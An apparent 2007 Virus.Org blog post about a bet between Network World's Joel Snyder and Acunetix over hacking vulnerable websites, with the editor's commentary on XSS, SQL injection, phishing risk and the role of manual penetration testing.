Main Menu

Login



Support Virus.Org

Help support Virus.Org by donating.
Donating allows us to keep this site free and pay the running costs of all our services.
Acunetix challenged to put up or shut up PDF Print E-mail
Written by Editor   
Wednesday, 14 February 2007 21:28
After yesterday's announcement by Acunetix of their year long survey of web site security, Joel Snyder of Network World has challenged Acunetix to a $1,000 bet to prove their original claim. Joel challenged Acunetix to take a selection of the 3,200 sites they discovered medium to high risk vulnerabilities and exploit them to steal personal information from 30% of them.

So Nick Galea (CEO) and Kevin J.Vella (VP Sales and Operations) of Acunetix accepted the challenge with a proviso of their own, that they try this against Network World's web site and not these other sites. Sure they could do this against the other sites, but without the permission of the owners it will land someone in court. Plus the moment they compromise someone's information it sets in to motion all kind of other consequences.

Now Network World and Snyder come back to the response by Acunetix here. It seems that they are haggling over what websites they should hack and what should constitute a hack. So it is a watch this space moment to see who wins out.

Thing is we think Joel is missing the point somewhat, firstly it isn't just about stealing personal information from databases. This is such a blinkered view of what really is at risk here when your talking about web site security. Sure there is a fair share of this lets steal information held on such and such web site, and I bet of those 3,200 a good chunk of those sites with SQL Injection problems will probably give up information in this way.

But in the Web 2.0 generation a good chunk of security risk is pushed back on to the user, not the company who runs the web site. Remember an Cross Site Scripting hole if exploited creatively can get the user to to give up their information to the bad guys themselves.

Sure things like stealing cookies is all well and good and sure some will of them will be useful. But that is not where the money is, the money is tricking the user to entering their Paypal or bank details into a page they think is legit and it gets sent to the bad guys and not the place the user thinks it will. Turning a potential vulnerability into an actual vulnerability is why people pay security professionals to break into sites and find these holes. It isn't just scanning a site with such and such tool printing a report and giving it to the client, it is taking the output of that tool, the manual testing performed by the tester and the experience and knowledge of the tester combining all of that into identifying a real and exploitable vulnerability. Then putting it into context of the client and developing a mitigation and quantifying the actual risk.

The security world is fast changing place, technology moves at a pace and security risks and threat vectors change almost as fast. With every technology advance there is a whole new crop of risks and threat vectors, in the late 90s it was all about network security, web application security wasn't even considered. Now network security is fairly well understood by businesses now the bulk of the effort it spent securing web applications, moving forward application security is still key but as web application technology evolves the way you look at the security problem has to change.

Add this page to your favorite Social Bookmarking websites
Digg! Reddit! Del.icio.us! Google! Live! Facebook! Technorati! StumbleUpon! Yahoo!
Last Updated ( Wednesday, 14 February 2007 21:50 )